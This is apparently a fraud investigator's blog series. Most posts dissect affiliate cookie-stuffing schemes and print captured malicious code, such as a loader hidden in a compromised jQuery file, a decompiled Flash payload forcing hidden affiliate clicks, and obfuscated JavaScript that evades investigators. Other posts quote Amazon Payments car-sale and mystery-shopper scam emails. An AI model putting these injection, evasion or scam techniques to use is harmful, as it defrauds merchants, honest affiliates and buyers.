Qbnews.cn ranks in the top 54,000 sites world-wide. Load it up in your browser and you’ll see nothing out of the ordinary. Fire up a Web debugger and monitor the outbound traffic from your machine though, and you will see an entirely different story: affiliate fraud.

This site has been compromised and the attacker (aka babyface) is using it to force the user’s browser into invisibly visiting a number of merchants via affiliate links. If the user then buys anything from the merchants in question within a certain amount of time, the fraudster behind all of this is paid a commission.

As always, finding the fraud is easy but telling the story of how it happens is the tricky part. This one had me stumped for a few minutes, so if you are up for a challenge then try it out for yourself before reading any further. If you’re still stumped, then let’s begin.

With reference to this packet log, loading up qbnews.com is going to result in a request www.52zhishi.com/v.swf which is then responsible for requesting www.52zhishi.com/v.asp. The ASP file returns a list of URLs (affiliate clicks included), the Flash payload in the browser then invisibly requests each of the links and cookies returned in these lookups result in forced/faked affiliate clicks.

The question now is where does the initial request to 52zhishi.com come from, i.e., what exactly is responsible for it? If you do a search for it statically (scan the HTML, search the packet trace) you’re not going to find the element responsible. And if you do a dynamic search (via the DOM) you’re still not going to find it. Babyface is somewhat predictable in that like much of the technical marvels blackhats in this space, he was not the brightest bulb on the ever shrinking Christmas tree specially reserved for them: he was totally predictable.

Take a look at http://www.qbnews.cn/statics/js/jquery.min.js and you’ll find what looks to be a Jquery library. But keep digging and you’ll come across something that shouldn’t be in there:

(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){try{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);var c=document;c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)+"=Yes;path=/;expires.../code>

In compromising this site, he has hidden his activities in this Jquery library. I've broken this down with the addition of my own comments (that's everything after //):

// so what we have here is code that will run every single time 
// qbnews.cn loads on a javascript enabled browser
(function()
{
  // Babyface is checking to see if a certain cookie has been set. 
  // If it has not then the following code will be executed. 
  // Instead of putting the name of the cookie as a string in the code
  // this genius has tried to throw investigators off of his tracks 
  // by making it a sequence of characters, when you evaluate these 
  // characters the name of the cookie comes out to "babyface" 
  if(document.cookie.indexOf(
    String.fromCharCode(98,97, 98,121, 102,97,99,101))==-1)
  {
    try
    {
      var expires=new Date();

      // babyface sets an expiry date for the cookie
      // 24*60*60 = 86400 seconds which is one day. so basically
      // he doesn't want to repeatedly attack the same browser
      // if it visits the site more than once in 24 hours
      expires.setTime(expires.getTime()+24*60*60*1000);
      var c=document;
      c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101) 
        + "=Yes;path=/;expires="+expires.toGMTString();
      var s=c.createElement("span");

      // getting ready to inject a flash payload which will kick 
      // off the attack. The payload is delivered from character 
      // sequence below which equals "http://www.52zhishi.com/v.swf"
      var p=String.fromCharCode(
        104,116,116,112,58,47,47,119,119, 
        119,46,53,50,122,104,105,115,104,
        105,46,99,111,109,47,118,46,115,119,102) 
        + "?i=" + (new Date()).valueOf();
      s.innerHTML=
        '<object type="application/x-shockwave-flash" data="'+p
        +'" width="1" height="1"> ';
        (function()
        {
          if(!c.body)
          {
            setTimeout(arguments.callee,1000)
          }
          else
          {
            c.body.insertBefore(s,c.body.lastChild)
          }
        })()
    }
    catch(e)
    {
    }
  }
})();

So the JavaScript above answers our earlier question of what is responsible for the request to 52zhishi.com. The SWF that is loaded a result of this JavaScript then calls an ASP file which has all of the links to which a visit will be forced. This SWF decompiles to the following dreadful code:

package flashcs_old_fla {
    import flash.events.*;
    import flash.display.*;
    import flash.net.*;
    import flash.system.*; 
    public dynamic class MainTimeline extends movieclip {
 
        public var loader:URLLoader;
        public var url:string;
        public var reqURL:URLRequest;
 
        public function MainTimeline(){
            addFrameScript(0, frame1);
        }
        function frame1(){
            Security.allowdomain("*");
            url = "http://www.52zhishi.com/v.asp";
            reqURL = new URLRequest(url);
            loader = new URLLoader(reqURL);
            loader.addEventListener(Event.COMPLETE, handleComplete);
            loader.dataFormat = URLLoaderDataFormat.VARIABLES;
        }
        public function handleComplete(_arg1:Event):void{
            var loader:* = null;
            var safe:* = nan;
            var url1:* = null;
            var url2:* = null;
            var url3:* = null;
            var url4:* = null;
            var url5:* = null;
            var url6:* = null;
            var url7:* = null;
            var url8:* = null;
            var url9:* = null;
            var url10:* = null;
            var url11:* = null;
            var url12:* = null;
            var url13:* = null;
            var url14:* = null;
            var url15:* = null;
            var url16:* = null;
            var url17:* = null;
            var url18:* = null;
            var url19:* = null;
            var url20:* = null;
            var request1:* = null;
            var request2:* = null;
            var request3:* = null;
            var request4:* = null;
            var request5:* = null;
            var request6:* = null;
            var request7:* = null;
            var request8:* = null;
            var request9:* = null;
            var request10:* = null;
            var request11:* = null;
            var request12:* = null;
            var request13:* = null;
            var request14:* = null;
            var request15:* = null;
            var request16:* = null;
            var request17:* = null;
            var request18:* = null;
            var request19:* = null;
            var request20:* = null;
            var event:* = _arg1;
            loader = URLLoader(event.target);
            safe = new number(loader.data["safe"]);
            url1 = new string(loader.data["url1"]);
            url2 = new string(loader.data["url2"]);
            url3 = new string(loader.data["url3"]);
            url4 = new string(loader.data["url4"]);
            url5 = new string(loader.data["url5"]);
            url6 = new string(loader.data["url6"]);
            url7 = new string(loader.data["url7"]);
            url8 = new string(loader.data["url8"]);
            url9 = new string(loader.data["url9"]);
            url10 = new string(loader.data["url10"]);
            url11 = new string(loader.data["url11"]);
            url12 = new string(loader.data["url12"]);
            url13 = new string(loader.data["url13"]);
            url14 = new string(loader.data["url14"]);
            url15 = new string(loader.data["url15"]);
            url16 = new string(loader.data["url16"]);
            url17 = new string(loader.data["url17"]);
            url18 = new string(loader.data["url18"]);
            url19 = new string(loader.data["url19"]);
            url20 = new string(loader.data["url20"]);
            if (safe == 1){
                try {
                    request1 = new URLRequest(url1);
                    request2 = new URLRequest(url2);
                    request3 = new URLRequest(url3);
                    request4 = new URLRequest(url4);
                    request5 = new URLRequest(url5);
                    request6 = new URLRequest(url6);
                    request7 = new URLRequest(url7);
                    request8 = new URLRequest(url8);
                    request9 = new URLRequest(url9);
                    request10 = new URLRequest(url10);
                    request11 = new URLRequest(url11);
                    request12 = new URLRequest(url12);
                    request13 = new URLRequest(url13);
                    request14 = new URLRequest(url14);
                    request15 = new URLRequest(url15);
                    request16 = new URLRequest(url16);
                    request17 = new URLRequest(url17);
                    request18 = new URLRequest(url18);
                    request19 = new URLRequest(url19);
                    request20 = new URLRequest(url20);
                    sendToURL(request1);
                    sendToURL(request2);
                    sendToURL(request3);
                    sendToURL(request4);
                    sendToURL(request5);
                    sendToURL(request6);
                    sendToURL(request7);
                    sendToURL(request8);
                    sendToURL(request9);
                    sendToURL(request10);
                    sendToURL(request11);
                    sendToURL(request12);
                    sendToURL(request13);
                    sendToURL(request14);
                    sendToURL(request15);
                    sendToURL(request16);
                    sendToURL(request17);
                    sendToURL(request18);
                    sendToURL(request19);
                    sendToURL(request20);
                } catch(e:error) {
                };
            };
        }
    }

}//package flashcs_old_fla

I give babyface a 1/10:

  • 1 point for Cookie-Stuffing
  • 1 point for compromising a server
  • 1 point for covering his tracks with obfuscated javascript
  • 1 point for trying to protect himself through javascript-set cookies
  • 1 point for having an SWF payload do the dirty work
  • -1 point for putting all of his eggs in one basket in the ASP response. Full dump here. Note the Amazon China affiliate click link (affiliate id 51fanlirb-23). He should be rotating through each of these and protecting them from investigators and other blackhat competitors
  • -3 points for absolutely dreadful code in the SWF

We’ve recently been watching an Amazon Associates fraudster taking remarkable efforts to cover his tracks.  Like many rogue Associates we’ve looked at, he’s stuffing cookies invisibly.  He’s using Flash-based stuffing, a technique first written up last year.  But he’s several notches more sophisticated than most:

The fraudster begins by buying a 125×125 IFRAME in the targeted site, here phonearena.com (much like the fraudster who targeted Venturebeat).

phonearena - affiliate fraud 1

But his Flash creates a doubly-invisible IFRAME — setting CSS visibility to “hidden” and also setting width and height to just 1 pixel each:

ExternalInterface.call("function(fffff) 
{ 
  var xxxxx = document.createElement (\'iframe\'); 
  xxxxx.id = \'xxxxx\'; 
  xxxxx.name = \'xxxxx\'; 
  xxxxx.style.visibility = \'hidden\'; 
  xxxxx.style.width = \'1px\';  
  xxxxx.style.height = \'1px\'; 
  var yyyyy = document.body; 
  yyyyy.appendChild (xxxxx); ...

If you’re hoping to see the fraudster’s IFRAME with ordinary visual inspection, you’ll be disappointed: it’s doubly-invisible, as instructed by the preceding code.

Second, the fraudster uses JavaScript to remove the IFRAME that stuffs Amazon cookies, just ten seconds after the IFRAME loads:

xxxxx.onload = function() 
{ 
  setTimeout (function() 
   {yyyyy.removeChild (xxxxx);}, 10000); 
 }; 
 xxxxx.src = fffff; }", arg1);

Any investigator wanting to find the fraudster’s IFRAME by inspecting the page DOM would have just ten seconds to do so — usually not enough.

Third, this fraudster is rotating among many Amazon Associates IDs.  We found one several months ago, then thirteen more this month.  By using multiple accounts, the fraudster spreads his earnings, and no single account stands out as unreasonably large.  Using many company names is relatively standard among folks with something to hide — recall Direct Revenue’s dozens of company names;.  (By using multiple names, companies seek to avoid the notoreity and additional scrutiny that could result from a single large identity.)  In contrast, any legitimate affiliate would want credit, recognition, and extra payment for its high traffic volume.  So spreading traffic across multiple IDs confirms that this fraudster knows it is breaking Amazon’s rules.

Relatedly, this fraudster carefully uses JavaScript to fake clicks such that HTTP Referers and other characteristics look legitimate when traffic reaches Amazon.  This method automatically causes HTTP Referer fields to take values consistent with the Associate IDs described above.  Here’s a sample of the code that fakes a click and causes HTTP Referers to flow accordingly:

var url="http://www.cellphonetech.net/ads/files/xx.php?dtecebenelcedteuea...";
var xxx = document.createElement ("a");
if (typeof(xxx.click) == 'undefined')
{ location.href = url;  }
else
{ xxx.href = url; document.body.appendChild(xxx); xxx.click(); }

Fourth, this fraudster is unusually cautious in how many users he stuffs.  In our testing, his ad stuffs only about one third of users.  Furthermore, he stuffs only on the first visit.  If your IP is not selected on the first visit, you will never be stuffed on any subsequent visit, no matter how many times you revisit.  He also limits his stuffing to certain geographies and with other restrictions we’ll save for another write-up.  Of course this caution comes at a cost — less stuffing relative to his media-buying costs — but the fraudster seems to find this profitable.  Specifically, this reduces his likelihood of detection — letting him continue at greater length.  Combining this caution with the fraudster’s use of Flash, double invisibility, and ten-second automatic removal from the DOM — and he’s unusually hard to catch.

How much money is this fraudster making?  We don’t know for sure, and Amazon has no reason to say.  But the fraudster is buying display ad space on a popular site (Alexa ranking <1500).  That can’t be cheap, and he must anticipate earning money more than enough to cover his costs.  As best we can tell, Amazon Associates is this fraudster’s entire business model, with no other networks being targeted — meaning that Amazon is paying the entire cost of this fraudster’s scheme.

Of course users see nothing — not even an extra popup or popunder.  Users do get a bit of bandwidth wasted by the extra page-load, but even folks on a mobile data plan probably wouldn’t notice.  The big loser is Amazon — paying affiliate fees, as much as 8%, to get traffic it otherwise would have received completely free.  We’re also struck by the losses to other affiliates: If another affiliate truly referred the user to Amazon, but this fraudster interceded to stuff its cookie, then the honest affiliate’s commission is stolen by this fraudster.

Here’s a sampling of the Amazon Associates IDs we’ve seen this fraudster using:

berryreview-20
fashionfunda-20
horrnigh-20
insidepulse0b-20
onlinecamer0a-20
rivcitspo-20
stratagonline-20
tecbitbytnib-20
tenetu-20
thechicfash04-20
zenilshroff-20

Full packet log of our first observation of this fraudster’s activities available here.

We call this fraudster Cellphonetech because his controlling server is cellphonetech dot net.  WHOIS indicates that the registrant is Lin Yong of Fujian China, email address joannatse01@gmail.com.

If you are a Linkshare affiliate competing for the same traffic as today’s rogue affiliate, know that you do not stand a chance. The reason for this is because Linkshare affiliate ‘smaqEgQUEvQ’ is unfairly using Cookie-Stuffing techniques to maximize his affiliate revenue.

Let’s look at how the scam is put together.

When visiting this page on wirelesscouponcode.com, casual inspection yields nothing out of the ordinary.

affiliate fraud

Open up the HTML source behind this page and scroll to line 279, note the hidden iframe (with a 1×1 height/width and CSS display set to none) pointing to a Linkshare affiliate click link:

<iframe 
 src="http://click.linksynergy.com/fs-bin/click?id=smaqEgQUEvQ&offerid=222015.10000603&subid=0&type=4" 
 WIDTH=1 HEIGHT=1 FRAMEBORDER=1  style="display:none">
</iframe>

This is HTML that will invisibly load the affiliate click link and in turn the merchant that it  routes through to (resulting in applicable cookies pushed onto the user’s machine), in this case it is att.com . I dynamically modified the page to show the att.com page that was hidden, follow the red arrow below

wirelesscouponcode_affiliate_fraud_1

 

As is unfortunately the case with Cookie-Stuffing, the merchant will pay an unearned commission to the rogue affiliate should the user make a purchase within a predefined amount of time. So the merchant will lose and honest affiliates lose as well (for their cookies may have been overwritten).

Can’t reproduce this for yourself? This packet trace confirms the behavior in question.

I give this fraudster a 1/10.

  • 1 point for basic Cookie-Stuffing

 

Upon casual inspection, bestpcantivirus.com reviews antivirus solutions for your PC. In their own words:

We recommend you the best antivirus software for your PC. Our reviews and recommendations are balanced from the performance, budget and easy to use. Below are the Top 3 Antivirus programs that will give you the best performance and are Worth The Value You Pay For!

affiliate fraud

There’s a little more to this site than meets the eye. When you visit each of the pages for the products reviewed, bestpcantivirus.com is invisibly forcing affiliate cookies associated with the product in question onto your machine. The idea is that if you end up buying one of these products further down the road, then Bestpcantivirus will be paid a commission for they claim themselves as the entity responsible for the purchase. This is fine if you clicked through on the appropriate affiliate click links, but that’s not what happens here, i.e., Bestpcantivirus is playing the game unfairly. If you are an affiliate competing for the same traffic then you are going to lose.

Line 43 in the HTML source of this bestpcantivirus page has an IMG tag with a src attribute set to a link which will redirect through to an affiliate click link (CJ affiliate id 5727502) and then onto Norton.

affiliate_fraud_norton_3

Bestpcantivirus knows what they are doing is wrong, so they set the width and height attributes of this malformed image to 1×1, this way you won’t see it if you are just browsing casually. affiliate fraudI dynamically modified the DOM to alter the dimensions of this image to 50×50, the red arrow highlights what is really going on:

affiliate fraud

As always, if you can’t reproduce this for yourself, this packet trace confirms the activity.

I give this scammer a 2/10:

  • 1 point for the most basic form of Cookie-Stuffing
  • 1 point for Cookie-Stuffing multiple merchants:
    Merchant CJ Affiliate Id
    AVG 5727502
    Eset 3840211
    F-Secure 3840211
    Kaspersky 5727502
    Pandasecurity 5727502
    Zonealarm 3840211

Venturebeat.com (Alexa Rank #2,957) has a number of options available to advertisers. They range from an $11 300×250 CPM model (that’s per thousand impressions on their site) all the way through to $1,500 per week for a 125×125 button:

venturebeat affiliate fraud

The weekly button is what is of interest to us today, for one of these advertisers is using Venturebeat to Cookie-Stuff their visitors and steal potential affiliate revenue from honest Amazon affiliates.

Here’s how the scam works:

  1. Advertiser buys advertising space from Venturebeat
  2. Venturebeat may do some quality control to make sure that the ad is a-okay. Which is fine, because if you load this particular scammer’s ad verbatim then it will not exhibit the Cookie-Stuffing behavior
  3. Venturebeat starts running the ad
  4. Once  the ad is running the advertiser flips a switch on the backend to start the Cookie-Stuffing

Short and sweet. The red arrows highlight the ad:

venturebeat-affiliate-fraud_0

For the technically inclined, this packet trace steps you through the entire page load and onto the Cookie-Stuffing behavior (the Amazon affiliate id being used in this scam is ‘kitchebelle02-20‘). Worthy of mention:

  • I’ve not attached the Flash in this packet trace, don’t hesitate to contact me if you want it
  • Until Venturebeat takes down this ad, you can reproduce this for yourself by repeatedly loading Venturebeat.com, keep watching your Web debugger until you see the Amazon affiliate URLs being loaded.
  • The scammer uses dreammediasite.com as a demilitarized.com zone to redirect through http://www.onlinespy.net/awesome-high-tech-kitchen-gadgets/ which then acts as the referrer to Amazon. That’s no blank referrer and if you load onlinespy.net without the demilitarized zone as the referrer then you simply get a WordPress site, nice!

I give this scammer a 5/10

  • 1 point for basic Cookie-Stuffing
  • 1 point for using the Flash Bandit (that’s how he displays the ad AND does Cookie-Stuffing)
  • 1 point for the demilitarized zone
  • 1 point for cycling through multiple Amazon affiliate id’s
  • 1 points for investing a fair penny into his scam

Recall from above that it takes $1,500 a week to run this ad. Assuming the scammer took the cheaper monthly option, that means it’s costing him at least $4,500 a month. If the scammer runs at a profit (why else would he be doing this?) then it’s safe for us to assume that Amazon itself is losing at least $4500 a month to this guy (they are paying a commission when none is owed) and honest Amazon affiliates are losing as well (remember that the nature of Cookie-Stuffing is such that the scammer may be overwriting the cookies of Amazon affiliates that compete for the same traffic)

Travelpixel.com is ranked in the top 100,000 sites in the UK. From their About Us page:

At TravelPixel we hand pick our deals by analysing individual sites one by one. The deals we select then go through our moderation checks to ensure they are valid, offer great value and are clearly displayed.

So they hand pick their deals by analyzing sites one at a time, super, but they hand pick their targets for affiliate fraud one at a time as well, i.e., travelpixel.com is Cookie-Stuffing.

Said the Affiliate: “no, no, it’s all a big mistake!”

It’s easy to say this is all a big mistake and it won’t happen again. Rogue affiliates try to sell this nonsense all of the time. Unfortunately for Travelpixel, the scheme they have concocted here makes it difficult to sell as a mistake.

Said the reader: “alright then, how do they do it?”

If you’re a savvy fraud investigator and have a few moments for a little challenge, then visit this Travelpixel page and try to get to the bottom what’s going on before reading any further. Remember, finding a Cookie-Stuffer is easy, but telling the story of what’s going on and how it’s happening is the challenge.

For those that don’t have a debug environment (or the patience) on the ready, take a look at this packet trace. In a nutshell:

  • The merchant targeted is holidayextras.co.uk
  • Affiliate Window is the affiliate network used (affiliate id 69714)
  • The false click (awclick.php) was triggered as a result of a 302 redirect from travelpixel.com/galaxy.php
  • travelpixel.com/galaxy.php was triggered as a result of a 302 redirect from travelpixel.com/v4_images/…_travelpixelcom.jpg

The question now is what triggered the lookup of travelpixel.com/v4_images/…_travelpixelcom.jpg? If you browse the HTML of this site (static inspection) you will find no reference to this image. If you fire up a debug environment and browse the DOM of this site (dynamic inspection) you will still find no reference to this image.

So what’s going on?

They know what they are doing is wrong and that investigators will eventually come-a-knocking, so they introduce two obstacles:

  • First, they thwart a static investigation by obfuscating their activity in JavaScript
  • Second, they hinder dynamic investigation by removing evidence of their wrong doing from the DOM

The sneaky JavaScript is introduced with a call to travelpixel.com/ajaxify/deal.js:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/
,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[
e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\
\b'+e(c)+'\\b','g'),k[c])}}return p}('$(c).d(4(){2 3=$(\'#0\').1("e");b(3==\'f\'){
8()}4 8(){2 6=$(\'#0\').1("a");2 7=$(\'#0\').1("9");$(\'#0\').s(\'<g p="5" q="r://
n.m.i/h/\'+6+\'j\'+7+\'k.l"/>\');$(\'#5\').o()}});',29,29,'offer_box|attr|var|timer
|function|description_test|merchantid|rander|testLink|date|ident|if|document|ready|
deal|on|img|v4_images|com|_|_travelpixelcom|jpg|travelpixel|www|remove|id|src|http|
append'.split('|'),0,{}))

If you deobfuscate this JavaScript, it boils down to:

$(document).ready(function()
{
  var timer=$('#offer_box').attr("deal");
  if(timer=='on')
  {
    testLink()
  }

  function testLink()
  {
    var merchantid = $('#offer_box').attr("ident");
    var rander=$('#offer_box').attr("date");
    $('#offer_box').append(
      '<img id="description_test" src="http://www.travelpixel.com/v4_images/'
      + merchantid 
      + '_'
      + rander
      + '_travelpixelcom.jpg"/>');
    $('#description_test').remove()
  }
});

This is JQuery that adds an image to the page (using the _travelcom.jpg link we were looking for earlier) and then quickly removes this image from the page directly thereafter.

From the evidence presented, this affiliate is a sneaky bugger that is trying to hide what he is getting up to. Unfortunately for him, the “it was a mistake!” routine just won’t cut it.

Unsurprisingly, he is targeting multiple merchants over multiple networks, a sample of which is as follows:

Using the CJ affiliate network (affiliate id ’1927868′):

www.budget.co.uk
www.ihg.com
www.thomson.co.uk

Using the AffiliateWindow network (affiliate id ’69714′):

www.parkbcp.co.uk
www.holidayextras.co.uk
www.travelsphere.co.uk

Said the fraudster: ‘did I at least get a good score?’

I’m afraid not fraudster, for it’s not like what is being done here is anything new. The obfuscation is a nice touch, but on its lonesome it is simply not enough to get a good score (specially considering what the 5+/10 fraudsters get up to). This site shouldn’t be dropping cookies all of the time (it makes reproduction of the infraction too easy for investigators) and it should be using a demilitarized zone.

As a result, the overall score is a lethargic 3/10:

  • 1 point for basic Cookie-Stuffing
  • 1 point for targeting multiple merchants
  • 1 point for obfuscation and attempts to hinder dynamic and static investigation

We look at another Bargain Hunter scammer today. I rate this chap higher than last week’s Bargain Hunter scammer because, as you’re about to see, today’s scammer puts a lot more effort into what he does.

So here we go, the Bargain Hunter scam is a four pronged attack which starts at cars.com

1. Scammer Sets the Trap

This ad on cars.com is for a 1998 BMW 323.

* 3/12/2013 update - this scammer has multiple postings on cars.com, here is another *

* 3/20/2013 update - listing from 3/12/2013 update is still active (1993 Mazda Miata MX-5), but seller is now using Devin Briese (devinbriese1@gmail.com) *

* 3/27/2013 update - here’s another listing on cars.com, seller is now using Ray Miller (ray.miller69@comcast.net) *

amazon payments scam and cars.com

At $5,100 it’s a pretty sweet deal, but it just gets better the more you chat to the gent behind the sale.

2. Victim Takes the Bait

+1 to this scammer from the get go because from what I can tell he is sampling his replies, i.e., he only replies to 1/ N requests for more information. Through sampling, he is significantly increasing the cost of an investigation and so mitigating the chance of getting caught.

After numerous attempts to make contact, I finally got a hit:

From: Adam Wigner (wigneradam@msn.com)
Subject: Cars.com used car lead for - 1998 BMW 323‏

Hi , 
My name is Adam, and I am emailing you about the 1998 BMW 323i 
Convertible that I have for sale. Here you have more information 
about my car (119,650 mileage , clean title , 6 Cyl. RWD , 
4-wheel ABS , automatic transmission ) Black exterior with an 
excellent condition tan leather interior that is fully loaded 
with options. Flawless interior/exterior condition. I am 
selling it at this final price of $5,100 because my wife died 
in a bike accident few months ago and brings me bad memories 
and that's the reason I want to sell it asap. I along with my
daughter decided to sell the house and we moved to my sister 
in Oklahoma City , OK trying to start a new life.

Thank you

The highlighted line about moving is important. It sets the tone for what is about to come, i.e., the car is no longer in the location it was originally claimed to be (so I can’t see it in person)

3. Scammer Gains Victim’s Trust

I asked the scammer for more pics:

From: 
Subject: Cars.com used car lead for - 1998 BMW 323‏

Forgive my impatience, I did not know the car had such
unfortunate memories for you. Regardless, when you can
could you please send me more pictures? It's hard to
know how good the condition is based upon a single pic.

You surely have a much better life waiting for you in sunny
oklahama. Once again, my deepest condolences for your loss,
ultimately it's still a great car so I hope we can make this a good deal on both sides.

The scammer replies with more pics and tells me again that the car is no longer with him, but that’s okay because it is now with Amazon!

From: Adam Wigner (wigneradam@msn.com)
Subject: Cars.com used car lead for - 1998 BMW 323‏

Hi ,

Please find the pics attached ! As I told you in my first
 e-mail we decided to move to my sister, trying to start 
a new life here. I am located in Oklahoma City (the car 
is in Oklahoma City too). Before leaving I had prearranged
the deal with Amazon Payments. The car is now located at 
Amazon's shipping company sealed with all papers, ready to
be delivered. The deal includes free delivery and it will 
arrive at your address in 3 days along title and bill of 
sale. You will have 5 days to test it and inspect the car 
and if by any reason you find something you don't like 
about it you can send it back at my expense.

If you are interested in knowing more info about how it 
works please click here on Amazon Payments and register, 
once you do that, Amazon Payments will send you the 
invoice with all the payment and shipping details you 
will also have proof that I am covered by them and a 
legitimate seller.

Thank you

 

amazon payments scam and cars.com

Free delivery of a car at that price, now that’s a deal for sure!

The Amazon Payments URL points to http://www.billing-support.com/, which is the real prize in this investigation. It allows us to get an idea of what else this fraudster is up to. From the Services tab:

amazon payments scam and cars.com

amazon payments scam and cars.com

* 3/20/2013 update – scammer is now using amazon-payments-secure-business.com *

I loved this from the Top Questions section:

amazon payments scam and cars.com

Just to be clear: billing-support.com is a scam! Amazon does not provide escrow services of this nature and is in no way affiliated with billing-support.com.

4. Victim Sends Money

I followed the scammer’s instructions and registered with billing-support.com. Shortly thereafter I received the following email claiming to be from Amazon Payments:

From: Amazon Payments (admin@marketplace-safety-transactions.com)
Subject: Amazon FPS Invoice‏

Thanks for using Amazon FPS for this order,   !
The next step is to pay for your item. Check out and pay to get your 
item as soon as possible.

Purchasing Information For Your Secure Amazon FPS Invoice
Seller: Adam Wigner

Buyer: 

Order Summary

Item:                   1998 BMW 323
Item(s) Subtotal:       $5,100.00 
Deposit:                $2,100.00 
Remaining Balance: 	$3,000.00 
Shipping & Handling: 	$0.00
Inspection Period: 	5 calendar days
Amazon Fee paid by: 	Seller
Quantity: 	        1

 	------

Total for this Order: 	$5,100.00

Payment Instructions:

How to make the payment? 

The first deposit of $2,100.00 must be submitted via MoneyGram 
service to the Amazon FPS Verified Agent in charge of your 
transaction. The Amazon FPS Verified Agent will secure the 
payment until you receive, inspect and accept the vehicle. You 
have to pay at any MoneyGram office with CASH using MONEY 
TRANSFER service, from your name and address as a Sender to 
our Amazon FPS Verified Agent name and address as a Receiver .

Find the nearest MoneyGram office in your area. MoneyGram 
agents are post offices, exchange offices or retail locations 
- grocery stores, mail box centers, drug stores, travel 
agencies, depots, other retail locations . Give the form, the 
money(cash), and a proof of identity to the clerk. Pay with 
MoneyGram. It's the easy and fast way to pay online, and it 
lets you shop without sharing your financial details with 
sellers. 

Please note: This is done automatically by our system, choosing 
from the list of available agents, in order to ensure the 
impartiality of this deal.

Amazon FPS Verified Agent

 First Name :	Jonathan E.
 Last Name : 	Griffin
 Address : 	4827 Noble Dr E
 City : 	Mobile
 State: 	AL
 Zip Code : 	36619-1907
 Country:	United States 

Confirm the MoneyGram payment receipt at the following fax number: 
+1 ( 719 ) 362-3997. 

*** Please do not make any marks on the transfer copy. The following 
information must be readable ***

- E-mail us the following details from the payment receipt: 
- Reference Number - 8 digits number from the receipt ; 
- Sender's Name and Address ; 
- Receiver's Name and Address ; 
- Exact Amount Sent . 

Please note: This invoice was sent to the following e-mail address: 
Have questions about this order? Contact Amazon FPS .  
Thank you for using Amazon Payments.
Amazon Flexible Payments Service (Amazon FPS). 
Earth's Biggest Selection.

amazon payments scam and cars.com

If you’re new to the Bargain Haunter scam, the fraud here is that our seller does not actually own the car, or at least has no intention of selling it. He wants me to wire money to Jonathan E Griffin in Mobile, AL. The chances are that Jonathan is but a money mule who has been conned into some other scam and is now expecting money to be sent to him. Once I send the money off, I won’t be receiving anything from Amazon Payments, for this is all just an illusion.

When Jonathan E Griffin gets my money, he may keep a small percentage for himself (perhaps as payment for being a Mystery Shopper) and then sends the balance off to another victim (or quite possibly the scammer).

The scammer launders the money through multiple victims so as to introduce complexity, cost and ultimately throw the law enforcement/investigators off of his tail. Sooner or later the money will exit the money mule ring and make its way to the scammer, if you follow the trail for long enough it always does.

Note that the email from Amazon Payments came from marketplace-safety-transactions.com and not the domain that I originally registered with. As a result, marketplace-safety-transactions.com is also in on the scam. If you’re considering any kind of transaction with anyone from this domain, caveat emptor, for you have been warned!

What to score this scammer?

I think it’s only fair to recognize the effort this scammer put into his scam. Note the Vehicle Report I received from Amazon Payments along with the invoice:

amazon payments scam and cars.com

Sure it’s all just text and it’s cheap and it does not mean anything, but it does show that he put effort into being the best scammer he could be (which is not that much, but still a noteworthy effort). Most of the bozos I deal with try to quickly pull this off all via one or two emails sent from their gmail accounts. Furthermore, he sent me a unique tracking id when I registered (referred to as a Case Id #), which means he is persisting state on his servers. So he has a little DB running behind this which means he had to develop it himself or invest time and money paying someone who could put this together for him.

At the end of the day, I rate this scammer 5/10

  • 1 point for a classic Bargain Hunter scam
  • 1 point for sampling the emails he responded to
  • 1 point for involving Amazon Payments and leveraging off of a great brand
  • 1 point for registering a sharp looking domain that looks pretty similar to Amazon Payments
  • 1 point for the tracking code

The Mystery Shopper scam is so popular that I have no problem covering it over and over again. Today’s fraudster tries to take me for a ride using the classic four pronged attack:

1. Scammer Baits a Victim

On a mailbox that does not exist, I received the following spam:

From: SSN 2013 [mailto:danela@sympatico.ca] 
Sent: Tuesday, January 29, 2013 8:03 AM
Subject: Ms-Network Info

Congratulations

We are accepting applications for qualified individuals to become 
a Mystery of Shopper.

Please reply this email with the following information below to 
sign up :

*~ Full Name                    :
*~ Address (No P.O Box) :
*~ City                              :
*~ Zip                               :
*~ Your Country                        :
*~ Your phone / Land phone :

You will receive a flat amount of $ 200 per assignment.
Full job description will be sent to you prior in your assignment.
You will have access to training materials after you register.
It's very exciting and hopefully will be successful. There is no fee 
to become a shopper

2. Scammer Verifies the Victim’s Details

I replied with the information that was requested. The scammer did not respond or bother to verify my details. Perhaps this scammer is running at such a large scale that he does not have to, for a response alone is enough verification.

3. Scammer Gains the Victim’s Trust

A few days later I received a USPS Priority Mail.

Mystery Shopper ScamIt contained the following:

  • 1 x check for $1980. He is “paying” me for services that have yet to be rendered, this is how he tries to gain my trust

Myster shopper scam

  • 1 x set of instructions. This includes details on the task I have been assigned in addition to the next mystery shopper that I am supposed to wire money to (the scam)

Myster Shopper Scam Myster Shopper Scam
4.Victim Indirectly Sends the Scammer a Check in Return

At this point I am supposed to rush off to the bank and send my own money to the scammer. Once my money has been sent off and after the check from above does not clear, I will have been the victim of wire fraud.

Overall this is not a very good scammer. I can’t help but get the feeling that he is either operating at a very large scale or a very small scale. Both of which would force him to minimize on expenses.

I rate this scammer a 2/10

  • 1 point for a basic Mystery Shopper Scam
  • 1 point for instructing me to wire money to the next Mystery Shopper
  • 1 point for being strictly about business! (see Fraudster Chit-Chat below)
  • -1 point because the next Mystery Shopper is in the USA (?)

Problems with the scam that impact this fraudster’s score:

  1. He did not verify my details. I think a phone call to at least check who is on the other side would have been nice, but perhaps he can’t afford it.
  2. The instructions sent were not of premium quality. There is no company logo and the email address provided as a point of contact is sure to set off alarm bells (sssshopperwilson@aol.com).
  3. Too many people involved: the original email received was from danela@sympatico.ca. The USPS Mail was from Jeffrey M Eastman. The check received was from George L Shashoua and Marilyn Shashoua. The instructions were from Markus Prescott, it has me wiring money to Mark Roberts

So that’s six people involved in this transaction. If the scammer wants a higher conversion rate, it would be within his interest to have fewer people involved.

Now one might say that there are so many people involved because it’s a money laundering scam. In this case the check I received is real and the next victim in the scam is Mark Roberts in Chicago. This is entirely possible. Someone somewhere has been robbed and our scammer is using the Mystery Shopper scam to filter money through the bank accounts of innocent victims (aka money mules).

